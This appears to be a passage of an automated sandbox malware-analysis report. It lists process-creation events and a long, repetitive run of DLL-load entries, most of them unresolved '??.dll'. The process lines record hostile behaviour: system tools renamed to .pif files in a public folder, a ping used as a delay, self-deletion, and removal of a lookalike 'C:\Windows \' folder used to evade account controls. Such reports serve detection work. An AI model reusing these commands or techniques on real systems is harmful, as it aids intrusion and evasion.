                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
